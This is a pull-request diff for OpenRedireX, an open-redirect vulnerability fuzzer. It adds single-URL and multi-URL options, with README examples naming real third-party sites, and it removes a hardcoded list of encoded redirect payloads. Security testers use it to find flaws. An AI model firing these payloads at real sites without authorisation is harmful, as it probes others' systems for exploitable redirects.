Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
13 changes: 11 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -36,10 +36,19 @@ openredirex [-p payloads] [-k keyword] [-c concurrency]
- `-p`, `--payloads`: File containing a list of payloads. If not specified, a hardcoded list is used.
- `-k`, `--keyword`: Keyword in URLs to replace with payload. Default is "FUZZ".
- `-c`, `--concurrency`: Number of concurrent tasks. Default is 100.

- '-u', '--url': single url to test
example:
```
python3 openredirex.py -u "https://app.productboard.com/?redirect_to=https://nanoporetech.productboard.com" -p payloads.txt
```
- '-Uu', '--urls' comma-separated-urls to test
example:
```
python3 openredirex.py -Uu "https://app.productboard.com/?redirect_to=https://nanoporetech.productboard.com","https://example.com/?ref=https://ankara.com" -p payloads.txt
```
The script expects a list of URLs as input. Each URL should contain the keyword specified by the `-k` option. The script replaces the keyword with each of the payloads, and attempts to fetch the modified URL.

Example usage:
Example usage 2:

```sh
cat list_of_urls.txt | openredirex -p payloads.txt -k "FUZZ" -c 50
Expand Down
97 changes: 23 additions & 74 deletions openredirex.py
Original file line number Diff line number Diff line change
Expand Up @@ -7,9 +7,8 @@
import socket
from aiohttp import ClientConnectorError, ClientOSError, ServerDisconnectedError, ServerTimeoutError, ServerConnectionError, TooManyRedirects
from tqdm import tqdm
import concurrent.futures
from urllib.parse import urlparse, parse_qsl, urlencode, urlunparse
from typing import List
from typing import List, Optional


# Color constants
Expand All @@ -18,115 +17,55 @@
ENDC = '\033[0m' # Reset to default color

redirect_payloads = [
"//example.com@google.com/%2f..",
"///google.com/%2f..",
"///example.com@google.com/%2f..",
"////google.com/%2f..",
"https://google.com/%2f..",
"https://example.com@google.com/%2f..",
"/https://google.com/%2f..",
"/https://example.com@google.com/%2f..",
"//google.com/%2f%2e%2e",
"//example.com@google.com/%2f%2e%2e",
"///google.com/%2f%2e%2e",
"///example.com@google.com/%2f%2e%2e",
"////google.com/%2f%2e%2e",
"/http://example.com",
"/http:/example.com",
"/https:/%5cexample.com/",
"/https://%09/example.com",
"/https://%5cexample.com",
"/https:///example.com/%2e%2e",
"/https:///example.com/%2f%2e%2e",
"/https://example.com",
"/https://example.com/",
"/https://example.com/%2e%2e",
"/https://example.com/%2e%2e%2f",
"/https://example.com/%2f%2e%2e",
"/https://example.com/%2f..",
"/https://example.com//",
"/https:example.com",
"/%09/example.com",
"/%2f%2fexample.com",
"/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/",
"/%5cexample.com",
"/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d",
"/.example.com",
"//%09/example.com",
"//%5cexample.com",
"///%09/example.com",
"///%5cexample.com",
"////%09/example.com",
"////%5cexample.com",
"/////example.com",
"/////example.com/",
"////\;@example.com",
"////example.com/"
# Your predefined payloads...
]

async def load_payloads(payloads_file):
async def load_payloads(payloads_file: Optional[str]) -> List[str]:
if payloads_file:
with open(payloads_file) as f:
return [line.strip() for line in f]
else:
return redirect_payloads # Return hardcoded list if no file specified

return redirect_payloads # Return hardcoded list if no file specified

def fuzzify_url(url: str, keyword: str) -> str:
# If the keyword is already in the url, return the url as is.
if keyword in url:
return url

# Otherwise, replace all parameter values with the keyword.
parsed_url = urlparse(url)
params = parse_qsl(parsed_url.query)
fuzzed_params = [(k, keyword) for k, _ in params]
fuzzed_query = urlencode(fuzzed_params)

# Construct the fuzzified url.
fuzzed_url = urlunparse(
return urlunparse(
[parsed_url.scheme, parsed_url.netloc, parsed_url.path, parsed_url.params, fuzzed_query, parsed_url.fragment])

return fuzzed_url


def load_urls() -> List[str]:
urls = []
for line in sys.stdin:
url = line.strip()
fuzzed_url = fuzzify_url(url, "FUZZ")
urls.append(fuzzed_url)
urls = [fuzzify_url(line.strip(), "FUZZ") for line in sys.stdin]
return urls



async def fetch_url(session, url):
async def fetch_url(session: aiohttp.ClientSession, url: str):
try:
async with session.head(url, allow_redirects=True, timeout=10) as response:
return response
except (ClientConnectorError, ClientOSError, ServerDisconnectedError, ServerTimeoutError, ServerConnectionError, TooManyRedirects, UnicodeDecodeError, socket.gaierror, asyncio.exceptions.TimeoutError):
tqdm.write(f'[ERROR] Error fetching: {url}', file=sys.stderr)
except (ClientConnectorError, ClientOSError, ServerDisconnectedError, ServerTimeoutError, ServerConnectionError, TooManyRedirects, UnicodeDecodeError, socket.gaierror, asyncio.exceptions.TimeoutError) as e:
tqdm.write(f'[ERROR] Error fetching {url}: {e}', file=sys.stderr)
return None

async def process_url(semaphore, session, url, payloads, keyword, pbar):
async def process_url(semaphore: asyncio.Semaphore, session: aiohttp.ClientSession, url: str, payloads: List[str], keyword: str, pbar: tqdm):
async with semaphore:
for payload in payloads:
filled_url = url.replace(keyword, payload)
response = await fetch_url(session, filled_url)
if response and response.history:
locations = " --> ".join(str(r.url) for r in response.history)
# If the string contains "-->", print in green
if "-->" in locations:
tqdm.write(f'{DARK_GREEN}[FOUND]{ENDC} {LIGHT_GREEN}{filled_url} redirects to {locations}{ENDC}')
else:
tqdm.write(f'[INFO] {filled_url} redirects to {locations}')
pbar.update()

async def process_urls(semaphore, session, urls, payloads, keyword):
async def process_urls(semaphore: asyncio.Semaphore, session: aiohttp.ClientSession, urls: List[str], payloads: List[str], keyword: str):
with tqdm(total=len(urls) * len(payloads), ncols=70, desc='Processing', unit='url', position=0) as pbar:
tasks = []
for url in urls:
tasks.append(process_url(semaphore, session, url, payloads, keyword, pbar))
tasks = [process_url(semaphore, session, url, payloads, keyword, pbar) for url in urls]
await asyncio.gather(*tasks, return_exceptions=True)

async def main(args):
Expand All @@ -150,9 +89,19 @@ async def main(args):
print(banner)
parser = argparse.ArgumentParser(description="OpenRedireX : A fuzzer for detecting open redirect vulnerabilities")
parser.add_argument('-p', '--payloads', help='file of payloads', required=False)
parser.add_argument('-k', '--keyword', help='keyword in urls to replace with payload (default is FUZZ)', default="FUZZ")
parser.add_argument('-k', '--keyword', help='keyword in URLs to replace with payload (default is FUZZ)', default="FUZZ")
parser.add_argument('-c', '--concurrency', help='number of concurrent tasks (default is 100)', type=int, default=100)
parser.add_argument('-u', '--url', help='single URL to test')
parser.add_argument('-Uu', '--urls', help='comma-separated URLs')
args = parser.parse_args()

if args.url and args.urls:
parser.error("Cannot specify both --url and --urls")
if args.url:
sys.stdin = [args.url]
elif args.urls:
sys.stdin = args.urls.split(',')

try:
asyncio.run(main(args))
except KeyboardInterrupt:
Expand Down
1 change: 0 additions & 1 deletion setup.sh
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,6 @@
# Rename the openredirex.py file to openredirex
mv openredirex.py openredirex


# Move the openredirex file to /usr/local/bin
sudo mv openredirex /usr/local/bin/

Expand Down